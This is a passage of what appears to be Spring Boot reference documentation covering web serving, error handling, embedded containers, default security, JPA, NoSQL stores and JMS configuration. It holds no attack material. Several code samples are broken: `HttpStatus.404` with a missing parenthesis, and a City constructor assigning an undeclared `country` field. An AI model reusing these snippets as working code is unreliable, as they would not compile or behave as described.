modify that behavior by adding your own `WebMvcConfigurerAdapter` and overriding the\n`addResourceHandlers` method.\n\nIn a stand-alone web application the default servlet from the container is also\nenabled, and acts as a fallback, serving content from the root of the `ServletContext` if\nSpring decides not to handle it. Most of the time this will not happen (unless you modify\nthe default MVC configuration) because Spring will always be able to handle requests\nthrough the `DispatcherServlet`.\n\nIn addition to the ``standard'' static resource locations above, a special case is made for\nhttp:\/\/www.webjars.org\/[Webjars content]. Any resources with a path in `\/webjars\/**` will\nbe served from jar files if they are packaged in the Webjars format.\n\nTIP: Do not use the `src\/main\/webapp` folder if your application will be packaged as a\njar. Although this folder is a common standard, it will *only* work with war packaging\nand it will be silently ignored by most build tools if you generate a jar.\n\n\n\n[[boot-features-spring-mvc-template-engines]]\n==== Template engines\n\nAs well as REST web services, you can also use Spring MVC to serve dynamic HTML content.\nSpring MVC supports a variety of templating technologies including Velocity, FreeMarker\nand JSPs. Many other templating engines also ship their own Spring MVC integrations.\n\nSpring Boot includes auto-configuration support for the following templating engines:\n\n * http:\/\/freemarker.org\/docs\/[FreeMarker]\n * http:\/\/beta.groovy-lang.org\/docs\/groovy-2.3.0\/html\/documentation\/markup-template-engine.html[Groovy]\n * http:\/\/www.thymeleaf.org[Thymeleaf]\n * http:\/\/velocity.apache.org[Velocity]\n\nWhen you're using one of these templating engines with the default configuration, your templates\nwill be picked up automatically from `src\/main\/resources\/templates`.\n\nTIP: JSPs should be avoided if possible, there are several\n<<boot-features-jsp-limitations, known limitations>> when using them with embedded\nservlet containers.\n\n\n\n[[boot-features-error-handling]]\n==== Error Handling\nSpring Boot provides an `\/error` mapping by default that handles all errors in a\nsensible way, and it is registered as a ``global'' error page in the servlet container.\nFor machine clients it will produce a JSON response with details of the error, the HTTP\nstatus and the exception message. For browser clients there is a ``whitelabel'' error\nview that renders the same data in HTML format (to customize it just add a `View` that\nresolves to ``error''). To replace the default behaviour completely you can implement\n`ErrorController` and register a bean definition of that type, or simply add a bean\nof type `ErrorAttributes` to use the existing mechanism but replace the contents.\n\nIf you want more specific error pages for some conditions, the embedded servlet containers\nsupport a uniform Java DSL for customizing the error handling. For example:\n\n[source,java,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t@Bean\n\tpublic EmbeddedServletContainerCustomizer containerCustomizer(){\n\t\treturn new MyCustomizer();\n\t}\n\n\t\/\/ ...\n\n\tprivate static class MyCustomizer implements EmbeddedServletContainerCustomizer {\n\n\t\t@Override\n\t\tpublic void customize(ConfigurableEmbeddedServletContainer container) {\n container.addErrorPages(new ErrorPage(HttpStatus.BAD_REQUEST, \"\/400\"));\n\t\t}\n\n\t}\n----\n\nYou can also use regular Spring MVC features like http:\/\/docs.spring.io\/spring\/docs\/current\/spring-framework-reference\/htmlsingle\/#mvc-exception-handlers[`@ExceptionHandler`\nmethods] and http:\/\/docs.spring.io\/spring\/docs\/current\/spring-framework-reference\/htmlsingle\/#mvc-ann-controller-advice[`@ControllerAdvice`].\nThe `ErrorController` will then pick up any unhandled exceptions.\n\n\n\n[[boot-features-embedded-container]]\n=== Embedded servlet container support\nSpring Boot includes support for embedded Tomcat and Jetty servers. Most developers will\nsimply use the appropriate ``Starter POM'' to obtain a fully configured instance. By\ndefault both Tomcat and Jetty will listen for HTTP requests on port `8080`.\n\n\n\n[[boot-features-embedded-container-servlets-and-filters]]\n==== Servlets and Filters\nWhen using an embedded servlet container you can register Servlets and Filters directly as\nSpring beans. This can be particularly convenient if you want to refer to a value from\nyour `application.properties` during configuration.\n\nBy default, if the context contains only a single Servlet it will be mapped to `\/`. In\nthe case of multiple Servlets beans the bean name will be used as a path prefix. Filters\nwill map to `\/*`.\n\nIf convention-based mapping is not flexible enough you can use the\n`ServletRegistrationBean` and `FilterRegistrationBean` classes for complete control. You\ncan also register items directly if your bean implements the `ServletContextInitializer`\ninterface.\n\n\n\n[[boot-features-embedded-container-application-context]]\n==== The EmbeddedWebApplicationContext\nUnder the hood Spring Boot uses a new type of `ApplicationContext` for embedded\nservlet container support. The `EmbeddedWebApplicationContext` is a special\ntype of `WebApplicationContext` that bootstraps itself by searching for a single\n`EmbeddedServletContainerFactory` bean. Usually a `TomcatEmbeddedServletContainerFactory`\nor `JettyEmbeddedServletContainerFactory` will have been auto-configured.\n\nNOTE: You usually won't need to be aware of these implementation classes. Most\napplications will be auto-configured and the appropriate `ApplicationContext` and\n`EmbeddedServletContainerFactory` will be created on your behalf.\n\n\n\n[[boot-features-customizing-embedded-containers]]\n==== Customizing embedded servlet containers\nCommon servlet container settings can be configured using Spring `Environment`\nproperties. Usually you would define the properties in your `application.properties`\nfile.\n\nCommon server settings include:\n\n* `server.port` -- The listen port for incoming HTTP requests.\n* `server.address` -- The interface address to bind to.\n* `server.sessionTimeout` -- A session timeout.\n\nSee the {sc-spring-boot-autoconfigure}\/web\/ServerProperties.{sc-ext}[`ServerProperties`]\nclass for a complete list.\n\n\n\n[[boot-features-programmatic-embedded-container-customization]]\n===== Programmatic customization\nIf you need to configure your embdedded servlet container programmatically you can register\na Spring bean that implements the `EmbeddedServletContainerCustomizer` interface.\n`EmbeddedServletContainerCustomizer` provides access to the\n`ConfigurableEmbeddedServletContainer` which includes numerous customization setter\nmethods.\n\n[source,java,indent=0]\n----\n\timport org.springframework.boot.context.embedded.*;\n\timport org.springframework.stereotype.Component;\n\n\t@Component\n\tpublic class CustomizationBean implements EmbeddedServletContainerCustomizer {\n\n\t\t@Override\n\t\tpublic void customize(ConfigurableEmbeddedServletContainer container) {\n\t\t\tcontainer.setPort(9000);\n\t\t}\n\n\t}\n----\n\n\n\n[[boot-features-customizing-configurableembeddedservletcontainerfactory-directly]]\n===== Customizing ConfigurableEmbeddedServletContainer directly\nIf the above customization techniques are too limited, you can register the\n`TomcatEmbeddedServletContainerFactory` or `JettyEmbeddedServletContainerFactory` bean\nyourself.\n\n[source,java,indent=0]\n----\n\t@Bean\n\tpublic EmbeddedServletContainerFactory servletContainer() {\n\t\tTomcatEmbeddedServletContainerFactory factory = new TomcatEmbeddedServletContainerFactory();\n\t\tfactory.setPort(9000);\n\t\tfactory.setSessionTimeout(10, TimeUnit.MINUTES);\n\t\tfactory.addErrorPages(new ErrorPage(HttpStatus.404, \"\/notfound.html\");\n\t\treturn factory;\n\t}\n----\n\nSetters are provided for many configuration options. Several protected method\n``hooks'' are also provided should you need to do something more exotic. See the\nsource code documentation for details.\n\n\n\n[[boot-features-jsp-limitations]]\n==== JSP limitations\nWhen running a Spring Boot application that uses an embedded servlet container (and is\npackaged as an executable archive), there are some limitations in the JSP support.\n\n* With Tomcat it should work if you use war packaging, i.e. an executable war will work,\n and will also be deployable to a standard container (not limited to, but including\n Tomcat). An executable jar will not work because of a hard coded file pattern in Tomcat.\n\n* Jetty does not currently work as an embedded container with JSPs.\n\nThere is a {github-code}\/spring-boot-samples\/spring-boot-sample-web-jsp[JSP sample] so\nyou can see how to set things up.\n\n\n\n[[boot-features-security]]\n== Security\nIf Spring Security is on the classpath then web applications will be secure by default\nwith ``basic'' authentication on all HTTP endpoints. To add method-level security to a web\napplication you can also add `@EnableGlobalMethodSecurity` with your desired settings.\nAdditional information can be found in the {spring-security-reference}#jc-method[Spring\nSecurity Reference].\n\nThe default `AuthenticationManager` has a single user (``user'' username and random\npassword, printed at INFO level when the application starts up)\n\n[indent=0]\n----\n\tUsing default security password: 78fa095d-3f4c-48b1-ad50-e24c31d5cf35\n----\n\nYou can change the password by providing a `security.user.password`. This and other\nuseful properties are externalized via\n{sc-spring-boot-autoconfigure}\/security\/SecurityProperties.{sc-ext}[`SecurityProperties`]\n(properties prefix \"security\").\n\nThe default security configuration is implemented in `SecurityAutoConfiguration` and in\nthe classes imported from there (`SpringBootWebSecurityConfiguration` for web security\nand `AuthenticationManagerConfiguration` for authentication configuration which is also\nrelevant in non-web applications). To switch off the Boot default configuration\ncompletely in a web application you can add a bean with `@EnableWebSecurity`. To customize\nit you normally use external properties and beans of type `WebConfigurerAdapter` (e.g. to\nadd form-based login). There are several secure applications in the\n{github-code}\/spring-boot-samples\/[Spring Boot samples] to get you started with common\nuse cases.\n\nThe basic features you get out of the box in a web application are:\n\n* An `AuthenticationManager` bean with in-memory store and a single user (see\n `SecurityProperties.User` for the properties of the user).\n* Ignored (unsecure) paths for common static resource locations (`\/css\/**`, `\/js\/**`,\n `\/images\/**` and `**\/favicon.ico`).\n* HTTP Basic security for all other endpoints.\n* Security events published to Spring's `ApplicationEventPublisher` (successful and\n unsuccessful authentication and access denied).\n* Common low-level features (HSTS, XSS, CSRF, caching) provided by Spring Security are\n on by default.\n\nAll of the above can be switched on and off or modified using external properties\n(`security.*`). To override the access rules without changing any other autoconfigured\nfeatures add a `@Bean` of type `WebConfigurerAdapter` with\n`@Order(SecurityProperties.ACCESS_OVERRIDE_ORDER)`.\n\nIf the Actuator is also in use, you will find:\n\n* The management endpoints are secure even if the application endpoints are unsecure.\n* Security events are transformed into `AuditEvents` and published to the `AuditService`.\n* The default user will have the `ADMIN` role as well as the `USER` role.\n\nThe Actuator security features can be modified using external properties\n(`management.security.*`). To override the application access rules\nadd a `@Bean` of type `WebConfigurerAdapter` and use\n`@Order(SecurityProperties.ACCESS_OVERRIDE_ORDER)` if you _don't_ want to override\nthe actuator access rules, or `@Order(ManagementServerProperties.ACCESS_OVERRIDE_ORDER)`\nif you _do_ want to override the actuator access rules.\n\n\n\n\n[[boot-features-sql]]\n== Working with SQL databases\nThe Spring Framework provides extensive support for working with SQL databases. From\ndirect JDBC access using `JdbcTemplate` to complete ``object relational mapping''\ntechnologies such as Hibernate. Spring Data provides an additional level of functionality,\ncreating `Repository` implementations directly from interfaces and using conventions to\ngenerate queries from your method names.\n\n\n\n[[boot-features-configure-datasource]]\n=== Configure a DataSource\nJava's `javax.sql.DataSource` interface provides a standard method of working with\ndatabase connections. Traditionally a DataSource uses a `URL` along with some\ncredentials to establish a database connection.\n\n\n\n[[boot-features-embedded-database-support]]\n==== Embedded Database Support\nIt's often convenient to develop applications using an in-memory embedded database.\nObviously, in-memory databases do not provide persistent storage; you will need to\npopulate your database when your application starts and be prepared to throw away\ndata when your application ends.\n\nTIP: The ``How-to'' section includes a '<<howto.adoc#howto-database-initialization, section\non how to initialize a database>>'\n\nSpring Boot can auto-configure embedded http:\/\/www.h2database.com[H2],\nhttp:\/\/hsqldb.org\/[HSQL] and http:\/\/db.apache.org\/derby\/[Derby] databases. You don't\nneed to provide any connection URLs, simply include a build dependency to the\nembedded database that you want to use.\n\nFor example, typical POM dependencies would be:\n\n[source,xml,indent=0]\n----\n\t<dependency>\n\t\t<groupId>org.springframework.boot<\/groupId>\n\t\t<artifactId>spring-boot-starter-data-jpa<\/artifactId>\n\t<\/dependency>\n\t<dependency>\n\t\t<groupId>org.hsqldb<\/groupId>\n\t\t<artifactId>hsqldb<\/artifactId>\n\t\t<scope>runtime<\/scope>\n\t<\/dependency>\n----\n\nNOTE: You need a dependency on `spring-jdbc` for an embedded database to be\nauto-configured. In this example it's pulled in transitively via\n`spring-boot-starter-data-jpa`.\n\n\n\n[[boot-features-connect-to-production-database]]\n==== Connection to a production database\nProduction database connections can also be auto-configured using a pooling\n`DataSource`. Here's the algorithm for choosing a specific implementation.\n\n* We prefer the Tomcat pooling `DataSource` for its performance and concurrency, so if\n that is available we always choose it.\n* If commons-dbcp is available we will use that, but we don't recommend it in production.\n\nIf you use the `spring-boot-starter-jdbc` or `spring-boot-starter-data-jpa`\n``starter POMs'' you will automcatically get a dependency to `tomcat-jdbc`.\n\nNOTE: Additional connection pools can always be configured manually. If you define your\nown `DataSource` bean, auto-configuration will not occur.\n\nDataSource configuration is controlled by external configuration properties in\n`spring.datasource.*`. For example, you might declare the following section\nin `application.properties`:\n\n[source,properties,indent=0]\n----\n\tspring.datasource.url=jdbc:mysql:\/\/localhost\/test\n\tspring.datasource.username=dbuser\n\tspring.datasource.password=dbpass\n\tspring.datasource.driverClassName=com.mysql.jdbc.Driver\n----\n\nSee {sc-spring-boot-autoconfigure}\/jdbc\/DataSourceProperties.{sc-ext}[`DataSourceProperties`]\nfor more of the supported options.\n\nNOTE: For a pooling `DataSource` to be created we need to be able to verify that a valid\n`Driver` class is available, so we check for that before doing anything. I.e. if you set\n`spring.datasource.driverClassName=com.mysql.jdbc.Driver` then that class has to be\nloadable.\n\n[[boot-features-using-jdbc-template]]\n=== Using JdbcTemplate\nSpring's `JdbcTemplate` and `NamedParameterJdbcTemplate` classes are auto-configured and\nyou can `@Autowire` them directly into your own beans:\n\n[source,java,indent=0]\n----\n\timport org.springframework.beans.factory.annotation.Autowired;\n\timport org.springframework.jdbc.core.JdbcTemplate;\n\timport org.springframework.stereotype.Component;\n\n\t@Component\n\tpublic class MyBean {\n\n\t\tprivate final JdbcTemplate jdbcTemplate;\n\n\t\t@Autowired\n\t\tpublic MyBean(JdbcTemplate jdbcTemplate) {\n\t\t\tthis.jdbcTemplate = jdbcTemplate;\n\t\t}\n\n\t\t\/\/ ...\n\n\t}\n----\n\n\n\n[[boot-features-jpa-and-spring-data]]\n=== JPA and ``Spring Data''\nThe Java Persistence API is a standard technology that allows you to ``map'' objects to\nrelational databases. The `spring-boot-starter-data-jpa` POM provides a quick way to get\nstarted. It provides the following key dependencies:\n\n* Hibernate -- One of the most popular JPA implementations.\n* Spring Data JPA -- Makes it easy to easily implement JPA-based repositories.\n* Spring ORMs -- Core ORM support from the Spring Framework.\n\nTIP: We won't go into too many details of JPA or Spring Data here. You can follow the\nhttp:\/\/spring.io\/guides\/gs\/accessing-data-jpa\/[``Accessing Data with JPA''] guide from\nhttp:\/\/spring.io and read the http:\/\/projects.spring.io\/spring-data-jpa\/[Spring Data JPA]\nand http:\/\/hibernate.org\/orm\/documentation\/[Hibernate] reference documentation.\n\n\n\n[[boot-features-entity-classes]]\n==== Entity Classes\nTraditionally, JPA ``Entity'' classes are specified in a `persistence.xml` file. With\nSpring Boot this file is not necessary and instead ``Entity Scanning'' is used. By\ndefault all packages below your main configuration class (the one annotated with\n`@EnableAutoConfiguration`) will be searched.\n\nAny classes annotated with `@Entity`, `@Embeddable` or `@MappedSuperclass` will be\nconsidered. A typical entity class would look something like this:\n\n[source,java,indent=0]\n----\n\tpackage com.example.myapp.domain;\n\n\timport java.io.Serializable;\n\timport javax.persistence.*;\n\n\t@Entity\n\tpublic class City implements Serializable {\n\n\t\t@Id\n\t\t@GeneratedValue\n\t\tprivate Long id;\n\n\t\t@Column(nullable = false)\n\t\tprivate String name;\n\n\t\t@Column(nullable = false)\n\t\tprivate String state;\n\n\t\t\/\/ ... additional members, often include @OneToMany mappings\n\n\t\tprotected City() {\n\t\t\t\/\/ no-args constructor required by JPA spec\n\t\t\t\/\/ this one is protected since it shouldn't be used directly\n\t\t}\n\n\t\tpublic City(String name, String state) {\n\t\t\tthis.name = name;\n\t\t\tthis.country = country;\n\t\t}\n\n\t\tpublic String getName() {\n\t\t\treturn this.name;\n\t\t}\n\n\t\tpublic String getState() {\n\t\t\treturn this.state;\n\t\t}\n\n\t\t\/\/ ... etc\n\n\t}\n----\n\nTIP: You can customize entity scanning locations using the `@EntityScan` annotation.\nSee the '<<howto.adoc#howto-separate-entity-definitions-from-spring-configuration>>'\nhow-to.\n\n\n[[boot-features-spring-data-jpa-repositories]]\n==== Spring Data JPA Repositories\nSpring Data JPA repositories are interfaces that you can define to access data. JPA\nqueries are created automatically from your method names. For example, a `CityRepository`\ninterface might declare a `findAllByState(String state)` method to find all cities\nin a given state.\n\nFor more complex queries you can annotate your method using Spring Data's\n{spring-data-javadoc}\/repository\/Query.html[`Query`] annotation.\n\nSpring Data repositories usually extend from the\n{spring-data-commons-javadoc}\/repository\/Repository.html[`Repository`] or\n{spring-data-commons-javadoc}\/repository\/CrudRepository.html[`CrudRepository`] interfaces. If you are using\nauto-configuration, repositories will be searched from the package containing your\nmain configuration class (the one annotated with `@EnableAutoConfiguration`) down.\n\nHere is a typical Spring Data repository:\n\n[source,java,indent=0]\n----\n\tpackage com.example.myapp.domain;\n\n\timport org.springframework.data.domain.*;\n\timport org.springframework.data.repository.*;\n\n\tpublic interface CityRepository extends Repository<City, Long> {\n\n\t\tPage<City> findAll(Pageable pageable);\n\n\t\tCity findByNameAndCountryAllIgnoringCase(String name, String country);\n\n\t}\n----\n\nTIP: We have barely scratched the surface of Spring Data JPA. For complete details check\ntheir http:\/\/projects.spring.io\/spring-data-jpa\/[reference documentation].\n\n\n\n[[boot-features-creating-and-dropping-jpa-databases]]\n==== Creating and dropping JPA databases\nBy default JPA database will be automatically created *only* if you use an embedded\ndatabase (H2, HSQL or Derby). You can explicitly configure JPA settings using\n`spring.jpa.*` properties. For example, to create and drop tables you can add the\nfollowing to your `application.properties`.\n\n[indent=0]\n----\n\tspring.jpa.hibernate.ddl-auto=create-drop\n----\n\nNOTE: Hibernate's own internal property name for this (if you happen to remember it\nbetter) is `hibernate.hbm2ddl.auto`. You can set it, along with other Hibernate native\nproperties, using `spring.jpa.properties.*` (the prefix is stripped before adding them\nto the entity manager). By default the DDL execution (or validation) is deferred until\nthe `ApplicationContext` has started. There is also a `spring.jpa.generate-ddl` flag, but\nit is not used if Hibernate autoconfig is active because the `ddl-auto`\nsettings are more fine grained.\n\n\n\n[[boot-features-nosql]]\n== Working with NoSQL technologies\nSpring Data provides additional projects that help you access a variety of NoSQL\ntechnologies including\nhttp:\/\/projects.spring.io\/spring-data-mongodb\/[MongoDB],\nhttp:\/\/projects.spring.io\/spring-data-neo4j\/[Neo4J],\nhttps:\/\/github.com\/spring-projects\/spring-data-elasticsearch\/[Elasticsearch],\nhttp:\/\/projects.spring.io\/spring-data-solr\/[Solr],\nhttp:\/\/projects.spring.io\/spring-data-redis\/[Redis],\nhttp:\/\/projects.spring.io\/spring-data-gemfire\/[Gemfire],\nhttp:\/\/projects.spring.io\/spring-data-couchbase\/[Couchbase] and\nhttp:\/\/projects.spring.io\/spring-data-cassandra\/[Cassandra].\nSpring Boot provides auto-configuration for Redis, MongoDB, Elasticsearch, Solr and\nGemfire; you can make use of the other projects, but you will need to configure them\nyourself. Refer to the appropriate reference documentation at\nhttp:\/\/projects.spring.io\/spring-data[projects.spring.io\/spring-data].\n\n\n\n[[boot-features-redis]]\n=== Redis\nhttp:\/\/redis.io\/[Redis] is a cache, message broker and richly-featured key-value store.\nSpring Boot offers basic auto-configuration for the https:\/\/github.com\/xetorthio\/jedis\/[Jedis]\nclient library and abstractions on top of it provided by\nhttps:\/\/github.com\/spring-projects\/spring-data-redis[Spring Data Redis]. There is a\n`spring-boot-starter-redis` ``Starter POM'' for collecting the dependencies in a\nconvenient way.\n\n\n\n[[boot-features-connecting-to-redis]]\n==== Connecting to Redis\nYou can inject an auto-configured `RedisConnectionFactory`, `StringRedisTemplate` or\nvanilla `RedisTemplate` instance as you would any other Spring Bean. By default the\ninstance will attempt to connect to a Redis server using `localhost:6379`:\n\n[source,java,indent=0]\n----\n\t@Component\n\tpublic class MyBean {\n\n\t\tprivate StringRedisTemplate template;\n\n\t\t@Autowired\n\t\tpublic MyBean(StringRedisTemplate template) {\n\t\t\tthis.template = template;\n\t\t}\n\n\t\t\/\/ ...\n\n\t}\n----\n\nIf you add a `@Bean` of your own of any of the auto-configured types it will replace the\ndefault (except in the case of `RedisTemplate` the exclusion is based on the bean name\n``redisTemplate'' not its type). If `commons-pool2` is on the classpath you will get a\npooled connection factory by default.\n\n\n\n[[boot-features-mongodb]]\n=== MongoDB\nhttp:\/\/www.mongodb.com\/[MongoDB] is an open-source NoSQL document database that uses a\nJSON-like schema instead of traditional table-based relational data. Spring Boot offers\nseveral conveniences for working with MongoDB, including the The\n`spring-boot-starter-data-mongodb` ``Starter POM''.\n\n\n\n[[boot-features-connecting-to-mongodb]]\n==== Connecting to a MongoDB database\nYou can inject an auto-configured `com.mongodb.Mongo` instance as you would any other\nSpring Bean. By default the instance will attempt to connect to a MongoDB server using\nthe URL `mongodb:\/\/localhost\/test`:\n\n[source,java,indent=0]\n----\n\timport com.mongodb.Mongo;\n\n\t@Component\n\tpublic class MyBean {\n\n\t\tprivate final Mongo mongo;\n\n\t\t@Autowired\n\t\tpublic MyBean(Mongo mongo) {\n\t\t\tthis.mongo = mongo;\n\t\t}\n\n\t\t\/\/ ...\n\n\t}\n----\n\nYou can set `spring.data.mongodb.uri` property to change the `url`, or alternatively\nspecify a `host`\/`port`. For example, you might declare the following in your\n`application.properties`:\n\n[source,properties,indent=0]\n----\n\tspring.data.mongodb.host=mongoserver\n\tspring.data.mongodb.port=27017\n----\n\nTIP: If `spring.data.mongodb.port` is not specified the default of `27017` is used. You\ncould simply delete this line from the sample above.\n\nYou can also declare your own `Mongo` `@Bean` if you want to take complete control of\nestablishing the MongoDB connection.\n\n\n\n[[boot-features-mongo-template]]\n==== MongoTemplate\nSpring Data Mongo provides a {spring-data-mongo-javadoc}\/core\/MongoTemplate.html[`MongoTemplate`]\nclass that is very similar in its design to Spring's `JdbcTemplate`. As with\n`JdbcTemplate` Spring Boot auto-configures a bean for you to simply inject:\n\n[source,java,indent=0]\n----\n\timport org.springframework.beans.factory.annotation.Autowired;\n\timport org.springframework.data.mongodb.core.MongoTemplate;\n\timport org.springframework.stereotype.Component;\n\n\t@Component\n\tpublic class MyBean {\n\n\t\tprivate final MongoTemplate mongoTemplate;\n\n\t\t@Autowired\n\t\tpublic MyBean(MongoTemplate mongoTemplate) {\n\t\t\tthis.mongoTemplate = mongoTemplate;\n\t\t}\n\n\t\t\/\/ ...\n\n\t}\n----\n\nSee the `MongoOperations` Javadoc for complete details.\n\n\n\n[[boot-features-spring-data-mongo-repositories]]\n==== Spring Data MongoDB repositories\nSpring Data includes repository support for MongoDB. As with the JPA repositories\ndiscussed earlier, the basic principle is that queries are constructed for you\nautomatically based on method names.\n\nIn fact, both Spring Data JPA and Spring Data MongoDB share the same common\ninfrastructure; so you could take the JPA example from earlier and, assuming that\n`City` is now a Mongo data class rather than a JPA `@Entity`, it will work in the\nsame way.\n\n[source,java,indent=0]\n----\n\tpackage com.example.myapp.domain;\n\n\timport org.springframework.data.domain.*;\n\timport org.springframework.data.repository.*;\n\n\tpublic interface CityRepository extends Repository<City, Long> {\n\n\t\tPage<City> findAll(Pageable pageable);\n\n\t\tCity findByNameAndCountryAllIgnoringCase(String name, String country);\n\n\t}\n----\n\nTIP: For complete details of Spring Data MongoDB, including its rich object mapping\ntechnologies, refer to their http:\/\/projects.spring.io\/spring-data-mongodb\/[reference\ndocumentation].\n\n\n\n[[boot-features-gemfire]]\n=== Gemfire\nhttps:\/\/github.com\/spring-projects\/spring-data-gemfire[Spring Data Gemfire] provides\nconvenient Spring-friendly tools for accessing the http:\/\/www.gopivotal.com\/big-data\/pivotal-gemfire#details[Pivotal Gemfire]\ndata management platform. There is a `spring-boot-starter-data-gemfire` ``Starter POM''\nfor collecting the dependencies in a convenient way. There is currently no auto=config\nsupport for Gemfire, but you can enable Spring Data Repositories with a\nhttps:\/\/github.com\/spring-projects\/spring-data-gemfire\/blob\/master\/src\/main\/java\/org\/springframework\/data\/gemfire\/repository\/config\/EnableGemfireRepositories.java[single annotation].\n\n\n\n[[boot-features-solr]]\n=== Solr\nhttp:\/\/lucene.apache.org\/solr\/[Apache Solr] is a search engine. Spring Boot offers basic\nauto-configuration for the solr client library and abstractions on top of it provided by\nhttps:\/\/github.com\/spring-projects\/spring-data-solr[Spring Data Solr]. There is\na `spring-boot-starter-data-solr` ``Starter POM'' for collecting the dependencies in a\nconvenient way.\n\n\n\n[[boot-features-connecting-to-solr]]\n==== Connecting to Solr\nYou can inject an auto-configured `SolrServer` instance as you would any other Spring\nBean. By default the instance will attempt to connect to a server using\n`http:\/\/localhost:8983\/solr`:\n\n[source,java,indent=0]\n----\n\t@Component\n\tpublic class MyBean {\n\n\t\tprivate SolrServer solr;\n\n\t\t@Autowired\n\t\tpublic MyBean(SolrServer solr) {\n\t\t\tthis.solr = solr;\n\t\t}\n\n\t\t\/\/ ...\n\n\t}\n----\n\nIf you add a `@Bean` of your own of type `SolrServer` it will replace the default.\n\n\n\n[[boot-features-spring-data-solr-repositories]]\n==== Spring Data Solr repositories\nSpring Data includes repository support for Apache Solr. As with the JPA repositories\ndiscussed earlier, the basic principle is that queries are constructed for you\nautomatically based on method names.\n\nIn fact, both Spring Data JPA and Spring Data Solr share the same common infrastructure;\nso you could take the JPA example from earlier and, assuming that `City` is now a\n`@SolrDocument` class rather than a JPA `@Entity`, it will work in the same way.\n\nTIP: For complete details of Spring Data Solr, refer to their\nhttp:\/\/projects.spring.io\/spring-data-solr\/[reference documentation].\n\n\n\n[[boot-features-elasticsearch]]\n=== Elasticsearch\nhttp:\/\/www.elasticsearch.org\/[Elastic Search] is an open source, distributed,\nreal-time search and analytics engine. Spring Boot offers basic auto-configuration for\nthe Elasticsearch and abstractions on top of it provided by\nhttps:\/\/github.com\/spring-projects\/spring-data-elasticsearch[Spring Data Elasticsearch].\nThere is a `spring-boot-starter-data-elasticsearch` ``Starter POM'' for collecting the\ndependencies in a convenient way.\n\n\n\n[[boot-features-connecting-to-elasticsearch]]\n==== Connecting to Elasticsearch\nYou can inject an auto-configured `ElasticsearchTemplate` or Elasticsearch `Client`\ninstance as you would any other Spring Bean. By default the instance will attempt to\nconnect to a local in-memory server (a `NodeClient` in Elasticsearch terms), but you can\nswitch to a remote server (i.e. a `TransportClient`) by setting\n`spring.data.elasticsearch.clusterNodes` to a comma-separated ``host:port'' list.\n\n[source,java,indent=0]\n----\n\t@Component\n\tpublic class MyBean {\n\n\t\tprivate ElasticsearchTemplate template;\n\n\t\t@Autowired\n\t\tpublic MyBean(ElasticsearchTemplate template) {\n\t\t\tthis.template = template;\n\t\t}\n\n\t\t\/\/ ...\n\n\t}\n----\n\nIf you add a `@Bean` of your own of type `ElasticsearchTemplate` it will replace the\ndefault.\n\n\n\n[[boot-features-spring-data-elasticsearch-repositories]]\n==== Spring Data Elasticsearch repositories\nSpring Data includes repository support for Elasticsearch. As with the JPA repositories\ndiscussed earlier, the basic principle is that queries are constructed for you\nautomatically based on method names.\n\nIn fact, both Spring Data JPA and Spring Data Elasticsearch share the same common\ninfrastructure; so you could take the JPA example from earlier and, assuming that\n`City` is now an Elasticsearch `@Document` class rather than a JPA `@Entity`, it will\nwork in the same way.\n\nTIP: For complete details of Spring Data Elasticsearch, refer to their\nhttp:\/\/docs.spring.io\/spring-data\/elasticsearch\/docs\/[reference documentation].\n\n\n\n[[boot-features-messaging]]\n== Messaging\nThe Spring Framework provides extensive support for integrating with messaging systems:\nfrom simplified use of the JMS API using `JmsTemplate` to a complete infrastructure to\nreceive messages asynchronously. Spring AMQP provides a similar feature set for the\n``Advanced Message Queuing Protocol'' and Boot also provides auto-configuration options\nfor `RabbitTemplate` and RabbitMQ. There is also support for STOMP messaging natively\nin Spring Websocket and Spring Boot has support for that through starters and a small\namount of auto configuration.\n\n\n\n[[boot-features-jms]]\n=== JMS\nThe `javax.jms.ConnectionFactory` interface provides a standard method of creating a\n`javax.jms.Connection` for interacting with a JMS broker. Although Spring needs a\n`ConnectionFactory` to work with JMS, you generally won't need to use it directly yourself\nand you can instead rely on higher level messaging abstractions (see the\n{spring-reference}\/#jms[relevant section] of the Spring Framework reference\ndocumentation for details).\n\n\n\n[[boot-features-hornetq]]\n==== HornetQ support\nSpring Boot can auto-configure a `ConnectionFactory` when it detects that HornetQ is\navailable on the classpath. If the broker is present, an embedded broker is started and\nconfigured automatically (unless the mode property has been explicitly set). The supported\nmodes are: `embedded` (to make explicit that an embedded broker is required and should\nlead to an error if the broker is not available in the classpath), and `native` to\nconnect to a broker using the the `netty` transport protocol. When the latter is\nconfigured, Spring Boot configures a `ConnectionFactory` connecting to a broker running\non the local machine with the default settings.\n\nNOTE: if you are using `spring-boot-starter-hornetq` the necessary dependencies to\nconnect to an existing HornetQ instance are provided, as well as the Spring infrastructure\nto integrate with JMS. Adding `org.hornetq:hornetq-jms-server` to your application allows\nyou to use the embedded mode.\n\nHornetQ configuration is controlled by external configuration properties in\n`spring.hornetq.*`. For example, you might declare the following section in\n`application.properties`:\n\n[source,properties,indent=0]\n----\n\tspring.hornetq.mode=native\n\tspring.hornetq.host=192.168.1.210\n\tspring.hornetq.port=9876\n----\n\nWhen embedding the broker, you can chose if you want to enable persistence, and the list\nof destinations that should be made available. These can be specified as a comma separated\nlist to create them with the default options; or you can define bean(s) of type\n`org.hornetq.jms.server.config.JMSQueueConfiguration` or\n`org.hornetq.jms.server.config.TopicConfiguration`, for advanced queue and topic\nconfigurations respectively.\n\nSee {sc-spring-boot-autoconfigure}\/jms\/hornetq\/HornetQProperties.{sc-ext}[`HornetQProperties`]\nfor more of the supported options.\n\nNo JNDI lookup is involved at all and destinations are resolved against their names,\neither using the ``name'' attribute in the HornetQ configuration or the names provided\nthrough configuration.\n\n\n\n[[boot-features-activemq]]\n==== ActiveMQ support\nSpring Boot can also configure a `ConnectionFactory` when it detects that ActiveMQ is\navailable on the classpath. If the broker is present, an embedded broker is started and\nconfigured automatically (as long as no broker URL is specified through configuration).\n\nActiveMQ configuration is controlled by external configuration properties in\n`spring.activemq.*`. For example, you might declare the following section in\n`application.properties`:\n\n[source,properties,indent=0]\n----\n\tspring.activemq.broker-url=tcp:\/\/192.168.1.210:9876\n\tspring.activemq.user=admin\n\tspring.activemq.password=secret\n----\n\nSee {sc-spring-boot-autoconfigure}\/jms\/activemq\/ActiveMQProperties.{sc-ext}[`ActiveMQProperties`]\nfor more of the supported options.\n\nBy default, ActiveMQ creates a destination if it does not exist yet, so destinations are\nresolved against their provided names.\n\n\n\n[[boot-features-using-jms-template]]\n==== Using JmsTemplate\nSpring's `JmsTemplate` is auto-configured and you can `@Autowire` it directly into your\nown 